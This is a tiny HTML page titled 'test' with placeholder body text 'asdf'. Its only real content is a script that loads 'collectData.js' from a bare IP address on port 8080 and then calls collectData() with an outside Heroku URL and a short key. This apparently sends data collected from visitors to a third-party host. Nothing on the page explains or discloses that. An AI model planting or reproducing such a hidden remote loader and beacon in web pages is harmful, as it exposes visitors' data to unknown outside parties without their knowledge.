<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8">
  <title>test</title>
  <script
    src="http://ajax.googleapis.com/ajax/libs/jquery/1.11.2/jquery.min.js">
  </script>
</head>
<body>
  asdf
  <script type="text/javascript" src="http://37.221.192.79:8080/collectData.js"></script>
  <script type="text/javascript">
  <!--
  collectData("https://immense-coast-7846.herokuapp.com", "9bWKZ");
  --></script>
</body>
</html>
